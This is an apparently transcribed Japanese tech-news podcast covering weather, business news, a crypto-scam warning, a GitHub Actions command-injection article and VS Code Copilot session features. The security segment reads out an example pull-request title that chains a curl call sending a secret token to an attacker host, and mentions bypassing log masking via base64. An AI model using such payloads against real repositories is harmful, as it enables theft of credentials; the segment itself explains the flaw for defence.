最新のテック情報をあなたに。テックキャスト。こんにちは、はるかです。2026年3月4日水曜日、皆さんいかがお過ごしですか？3月4日ということで、今日はミシンの日だそうです。ミシシンの語呂合わせですね。昔ながらの足踏みミシンから、今では刺繍のパタランを読み込んで自動で縫ってくれるコンピューターミシンまで、ミシンもすごい進化を遂げましたよね。一つの作業を自動化してくれるという点では、私たちが普段使っているプログラミングや CICD チュールにも通じるものがあるかもしれません。手仕事とテクノロジー、意外と近い関係にあるのかもしれませんね。さて、今日のポッドキャストでは、まず前半で気になるお天気の話から、ゲーム業界の大きな資本の動き、そしてちょっと注意が必要な暗号資産のニュースまで、幅広く時事ネタを追っていきます。そして後半は、私たち開発者には見逃せない GitHub のセキュリティに関する重要な話題と、 AI コーディングアシスタントの便利な新機能についてじっくりと深掘りしていきます。気になるニュース、一緒に深掘りしていきましょう。まずは今日の天気に関するニュースです。ヤフーニュースから、関東甲信から北海道大雪に注意という記事です。急速に発達する低気圧の影響で、今日の4日にかけて関東甲信地方から北海道にかけて広い範囲で大雪となる恐れがあるとのことです。特に注意が必要なのが雪の量ですね。今日4日の午後6時までの24時間に降る雪の量は、多いところで北海道で50センチ、東北の太平洋側の山地で40センチ、関東北部の山地で30センチと予想されています。甲信地方でも20センチ、箱根や多摩、秩父でも10センチの積雪が見込まれているそうです。かなりの量ですよね。東京など関東南部の市街地では、雪ではなく雨のところがほとんどの見込みだそうですが、内陸や山沿いにお住まいの方は、積雪や路面の凍結に十分な注意が必要です。スリップ事故や雪崩、それから雪の重みで電線が切れてしまう着雪による停電などにも備えておきたいですね。一方で気温の変化も大きいようです。昨日真冬の寒さだった東京は、今日の最高気温が昨日より6度も高い14度まで上がる予想です。午後は日差しも戻ってくるみたいなので、少しホッとできるかもしれません。ただ朝晩は冷え込みますし、雪が降る地域では路面が凍結しやすくなります。対象地域にお住まいの方や、お車を運転される方は、くれぐれも最新の情報を確認して、安全第一で行動してくださいね。続いては、ゲーム業界の大きな動きです。同じくヤフーニュースから、DNA、任天堂株式145億円分を売却というニュースです。スマートフォンゲームの開発などで知られる DNA が、保有している任天堂の株式の一部を売却したという発表です。売却した株数は165万7400株、金額にして145億円にもなります。これは任天堂自身が実施した自己株式取得に応じた形だそうです。ここでちょっと専門用語が出てきましたね。自己株式取得というのは、会社が自分自身の会社の株を市場から買い戻すことです。株価を安定させたり、株主への利益還元になったりする目的で行われることが多いですね。任天堂は今回、総額で約1000億円、正確には999億2106万円分の自己株式取得を完了したと発表しています。DNA の売却はその一部だったわけですね。DNA と任天堂は、2015年から業務資本提携を結んでいて、スーパーマリオランやファイアーエンブレムヒーローズといった人気のスマートフォン向けゲームを共同で開発してきました。今回の株式売却で DNA は2026年3月期に124億円の売却益を計上する見込みだそうです。この売却で得た資金を DNA は今後の事業投資や、同時に発表している最大500億円規模の自社株買いなどに充てるのかもしれません。両者の提携関係がこれからどうなっていくのか、 ゲームファンとしても IT 業界に身を置く者としても非常に気になるところです。
次は百貨店業界のニュースです。そごう・西武の新しい経営体制についての話題です。そごう・西武社長に親会社の流子という記事です。そごう・西武は4月1日付で新しい社長に親会社である投資ファンドフォートレスインベストメントジャパンの劉金氏が就任すると発表しました。劉氏は1984年生まれとのことで非常に若いリーダーの誕生ですね。中国の内モンゴル出身で東京大学の大学院を修了後モルガンスタンレーなどを経てフォートレスに入社したという経歴の持ち主です。ご存知の方も多いと思いますが、そごう・西武は業績低迷が続き、2023年9月にセブン&アイホールディングスからこの投資ファンドであるフォートレスに売却されました。劉氏は売却後から代表取締役として経営に関わってきました。今回の社長就任にあたって劉氏はこれまでの改革フェーズから一歩進み、明確に成長に向けて攻めるフェーズに入る、意思決定のスピードを一層高めるとコメントしています。力強い言葉ですよね。百貨店業界全体が厳しい状況にある中で、投資ファンド主導の経営改革がこれから本格化するということだと思います。特に私たちとしては、デジタル技術をどう活用して攻めの経営を実現していくのか、例えばオンラインと実店舗を融合させた新しい買い物体験の提供など、どんな新しい戦略が出てくるのか注目していきたいですね。
前半最後のニュースは少し注意喚起も兼ねた話題です。 IT カテゴリーから、金融庁サナエトークン調査へというニュースです。高市早苗首相の名前とイラストが使われたサナエトークンという暗号資産、つまり仮想通貨について金融庁が関連業者への調査を検討していることが分かったという内容です。問題になっているのは、まず日本で暗号資産を発行したり交換したりする事業を行うには金融庁への登録が必要なんですが、このトークンの運営に関わったとされる企業の登録が確認できていない点です。もし無登録で事業を行っていた場合、資金決済法という法律に違反する可能性があります。そしてもう一つ、もちろんですが高市首相ご本人はこのトークンについて、私は全く存じ上げないと自身の X、 旧ツイッターアカウントで投稿し、事務所とも関係がないことを明言した上で注意を呼びかけています。有名人の名前を無断で使って信頼性を装う出口は残念ながらよく見られます。最近は特定のコミュニティで盛り上がるミームコインと呼ばれるような暗号資産もたくさんありますが、その中には詐欺的なものも少なくありません。金融庁はこれから関係者への聞き取りなどを行って実態把握を急ぐ方針とのことです。リスナーの皆さんも有名人の名前がついているからといって安易に信用せず、発行元がはっきりしない暗号資産や投資話にはくれぐれも注意してくださいね。さて、前半は経済や社会のニュースを中心にお届けしました。ここからはガラッと雰囲気を変えて、私たちエンジニアやテクノロジーに関心のある方にはたまらないディープな技術トピックに移っていきましょう。
後半最初のトピックは、開発者なら誰もが使っている GitHub に関する非常に重要なセキュリティの話です。前の記事から、PR を送るだけでリポジトリを乗っ取れる GitHub Actions の危ない書き方を実際に検証してみたです。これはかなり衝撃的なタイトルですよね。最近ハッカーボットクラウと呼ばれる AI を搭載した自動攻撃ボットが大手企業のプロジェクトを含む多くのリポジトリに対して攻撃を仕掛け、実際に書き込み権限を持つ GitHub トークンを盗み出すことに成功したという事件がありました。この記事ではその攻撃手法を実際に再現検証しています。脆弱性の根本的な原理は GitHub Actions のワークフローの書き方のミスにあります。 GitHub Actions はリポジトリでの特定の操作、例えばプルリクエストが作成された時などに自動で処理を実行してくれる便利な機能です。記事で指摘されている最も危険な書き方の一つが PR タイトルインジェクションです。 例えばワークフローファイルに Run、Echo、New PR Received、ドラマーク実家テコロン、イベントコロン、プルリクエストコロン、タイトルのような記述があったとします。これは新しいプルリクエストが来たらそのタイトルをログに出力するという単純な処理です。しかし攻撃者はプルリクエストのタイトルを例えばテストセミコロンカールアタッカー .com/steal ドラマークセクレットトークンシャープのように悪意のあるコマンドを含んだものにして送ります。するとこのドラマーク実家テコロンという書き方で直接タイトルを展開していると単なる文字列ではなくコマンドの一部として解釈されて実行されてしまうんです。これがコマンドインジェクションです。記事の検証では実際にファイルを作成したり環境変数に設定されたシークレット情報を外部に送信したりできることが示されています。 GitHub のログ上ではシークレット情報はシャープとマスクされますが記事にあるようにベース64でエンコードしたりカールで外部サーバーに直接送信したりすればこのマスクは簡単に回避できてしまいます。対策はランステップの中で直接ドラーマーク実家テコロンを使わないことです。代わりにまず演武ブロックでコンテキストを環境変数に格納しランステップの中でドラマーク PR タイトルのようにシェル変数としてダブルクオーテーションで囲って安全に参照することが推奨されています。もう一つ危険なのがプルリクエストターゲットというトリガーを使うケースです。これはフォークされたリポジトリからの PR でも本体リポジトリの権限やシークレット情報を使ってワークフローを実行するものです。これを使いながら PR に含まれる攻撃者が書いたコードをチェックアウトして実行してしまうと簡単にシークレット情報を盗まれてしまいます。便利さと危険は隣り合わせということですね。皆さんもご自身の GitHub Actions の設定を一度見直してみてはいかがでしょうか。
さて最後のトピックです。こちらも開発者にとって嬉しい効率化の話題。前からVS コードプラス GitHub コパイロットで並列タスクが快適になったのでやり方を整理するという記事です。 GitHub コパイロットをエージェントモードで使って複数のタスクを同時に進めたいけど管理が大変で結局一つずつやっていたという経験ある方も多いんじゃないでしょうか。この記事では VS コードの2026年1月のアップデートバージョン 1.19 で追加されたエージェントセッション管理 UI がその悩みを解決してくれたと紹介しています。具体的に何が変わったかというとまずチャットパネルにコパイロットとのやり取りのセッションを一覧表示できる UI が追加されました。これがすごく便利で各セッションが今どういう状態なのか例えば作業中なのか承認待ちなのかそれとも完了したのかがアイコンで一目でわかるようになったんです。周知、パウズ、チェックのアイコンですね。これならあるタスクの実行を待ちながら別のタスクの承認依頼にすぐ対応するといった動きがスムーズにできます。さらにセッション名にカーソルを合わせると内容がポップアップで表示されたり F2 キーでセッション名をチケット名などにリネームして管理しやすくしたり完了したタスクをアーカイブして整理したりとかゆいところに手が届く機能が満載です。この記事で強調されているうまく回すコツがとても参考になります。それはコパイロットに丸ごと任せる前提で指示を出すこと。細かく次これやってと指示するのではなく最初に要件や制約をまとめて渡してあとはコパイロットに自律的に計画、実装、テストまで進めてもらう。私たちは計画のレビューや最終確認で承認を出すだけというスタイルです。こうすることで初めて人間は別の作業に集中できて本当の意味での並列開発が実現するわけですね。ただ一つ大きな制約として複数のプロジェクトを一つのウィンドウで開くマルチルートワークスペースにはまだうまく対応していないそうです。これが解決されればさらに強力なツールになりそうですね。とはいえ VS コードと GitHub コパイロットだけで並列開発がかなり実用的になってきたことがわかるとてもワクワクする記事でした。皆さんの開発効率を上げるヒントになるかもしれません。
というわけで今日は冬の終わりを感じさせる天気の話から経済ニュースそして GitHub Actions のセキュリティという守りの話とコパイロットで開発を加速させる攻めの話まで盛りだくさんでお届けしました。テクノロジーは私たちの生活や仕事を便利にしてくれますがその仕組みを正しく理解して安全にそして賢く使っていくことが大切ですね。次回の更新もお楽しみに。 はるかでした。バイバイ。